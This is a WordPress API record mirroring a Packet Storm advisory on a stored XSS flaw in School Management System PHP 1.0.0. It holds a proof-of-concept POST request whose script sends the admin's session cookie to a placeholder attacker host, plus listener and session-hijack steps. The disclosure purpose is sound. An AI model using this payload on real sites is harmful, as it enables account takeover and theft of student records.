{"id":50208,"date":"2026-04-29T12:45:28","date_gmt":"2026-04-29T12:45:28","guid":{"rendered":"http:\/\/localhost\/?p=50208"},"modified":"2026-04-29T12:45:28","modified_gmt":"2026-04-29T12:45:28","slug":"school-management-system-php-100-cross-site-scripting","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=50208","title":{"rendered":"\ud83d\udcc4 School Management System PHP 1.0.0 Cross Site Scripting_PACKETSTORM:220054"},"content":{"rendered":"

{“lastseen”:”2026-04-29T17:05:17″,”description”:”School Management System PHP version 1.0.0 suffers from a persistent cross site scripting vulnerability that can lead to administrative account takeover…”,”published”:”2026-04-29T00:00:00″,”modified”:”2026-04-29T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 School Management System PHP 1.0.0 Cross Site Scripting”,”source”:””,”references”:””,”id”:”PACKETSTORM:220054″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”====================================================\\n School Management System PHP – Stored XSS leading to Admin Account Takeover\\n ====================================================\\n \\n Author: Mehmet Utku K\u00f6ken\\n Date: 2026-04-28\\n CVE: N\/A \\n Vendor Homepage: https:\/\/github.com\/codingWithElias\/school-management-system-php\\n Version: 1.0.0 (commit f1ac334)\\n Tested on: Windows 10 \/ XAMPP \/ PHP 8.x\\n Category: Webapps\\n Platform: PHP\\n \\n == Description ==\\n \\n A Stored Cross-Site Scripting (XSS) vulnerability exists in\\n School Management System PHP. The contact form located at\\n \/req\/contact.php fails to sanitize the full_name and message\\n parameters before storing them in the database. When an\\n administrator views the messages panel at \/admin\/message.php,\\n the stored payload executes within the admin’s browser context.\\n This allows an unauthenticated attacker to steal the admin\\n session cookie and perform a full account takeover.\\n \\n == Affected Parameters ==\\n \\n – full_name\\n – message\\n \\n == Affected Files ==\\n \\n – \/req\/contact.php (unsanitized input stored)\\n – \/admin\/message.php (payload execution)\\n \\n == Steps to Reproduce ==\\n \\n 1. Navigate to the contact form:\\n http:\/\/TARGET\/school-management-system-php\/\\n \\n 2. Intercept the POST request and inject the payload\\n into the full_name or message parameter:\\n \\n POST \/school-management-system-php\/req\/contact.php HTTP\/1.1\\n Host: TARGET\\n Content-Type: application\/x-www-form-urlencoded\\n \\n email=attacker@evil.com\\u0026full_name=\\u003cscript\\u003enew Image().src=’http:\/\/ATTACKER:8888\/?c=’+document.cookie\\u003c\/script\\u003e\\u0026message=hello\\n \\n 3. Start a listener on the attacker machine:\\n \\n python3 -m http.server 8888\\n \\n 4. Wait for the administrator to visit the messages panel:\\n http:\/\/TARGET\/school-management-system-php\/admin\/message.php\\n \\n 5. The attacker’s listener receives the admin session cookie:\\n \\n GET \/?c=PHPSESSID=ao7emtlus8bf87dkpumutl4v3q HTTP\/1.1\\n \\n 6. Use the captured session cookie to access the admin panel\\n without credentials by setting:\\n \\n Cookie: PHPSESSID=ao7emtlus8bf87dkpumutl4v3q\\n \\n Then navigate to:\\n http:\/\/TARGET\/school-management-system-php\/admin\/\\n \\n == Impact ==\\n \\n An unauthenticated attacker can submit a malicious payload\\n via the public contact form. Once the administrator views\\n the messages, the attacker receives the admin PHPSESSID and\\n gains full administrative access to the application including\\n student records, teacher data and system configuration.\\n \\n \\n == References ==\\n \\n https:\/\/owasp.org\/www-community\/attacks\/xss\/\\n https:\/\/github.com\/codingWithElias\/school-management-system-php”,”sourceHref”:”https:\/\/packetstorm.news\/download\/220054″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/220054\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2026-04-29T17:05:17″,”description”:”School Management System PHP version 1.0.0 suffers from a persistent cross site scripting vulnerability that can lead to administrative account takeover…”,”published”:”2026-04-29T00:00:00″,”modified”:”2026-04-29T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 School Management System PHP…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-50208","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 School Management System PHP 1.0.0 Cross Site Scripting_PACKETSTORM:220054 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=50208\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 School Management System PHP 1.0.0 Cross Site Scripting_PACKETSTORM:220054 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2026-04-29T17:05:17″,”description”:”School Management System PHP version 1.0.0 suffers from a persistent cross site scripting vulnerability that can lead to administrative account takeover…”,”published”:”2026-04-29T00:00:00″,”modified”:”2026-04-29T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 School Management System PHP...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=50208\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-04-29T12:45:28+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=50208#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=50208\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 School Management System PHP 1.0.0 Cross Site Scripting_PACKETSTORM:220054\",\"datePublished\":\"2026-04-29T12:45:28+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=50208\"},\"wordCount\":537,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"exploit\",\"news\",\"NONE\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=50208#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=50208\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=50208\",\"name\":\"\ud83d\udcc4 School Management System PHP 1.0.0 Cross Site Scripting_PACKETSTORM:220054 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-04-29T12:45:28+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=50208#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=50208\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=50208#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 School Management System PHP 1.0.0 Cross Site Scripting_PACKETSTORM:220054\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 School Management System PHP 1.0.0 Cross Site Scripting_PACKETSTORM:220054 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=50208","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 School Management System PHP 1.0.0 Cross Site Scripting_PACKETSTORM:220054 - zero redgem","og_description":"{“lastseen”:”2026-04-29T17:05:17″,”description”:”School Management System PHP version 1.0.0 suffers from a persistent cross site scripting vulnerability that can lead to administrative account takeover…”,”published”:”2026-04-29T00:00:00″,”modified”:”2026-04-29T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 School Management System PHP...","og_url":"https:\/\/zero.redgem.net\/?p=50208","og_site_name":"zero redgem","article_published_time":"2026-04-29T12:45:28+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=50208#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=50208"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 School Management System PHP 1.0.0 Cross Site Scripting_PACKETSTORM:220054","datePublished":"2026-04-29T12:45:28+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=50208"},"wordCount":537,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","exploit","news","NONE","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=50208#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=50208","url":"https:\/\/zero.redgem.net\/?p=50208","name":"\ud83d\udcc4 School Management System PHP 1.0.0 Cross Site Scripting_PACKETSTORM:220054 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-04-29T12:45:28+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=50208#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=50208"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=50208#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 School Management System PHP 1.0.0 Cross Site Scripting_PACKETSTORM:220054"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/50208","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=50208"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/50208\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=50208"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=50208"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=50208"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}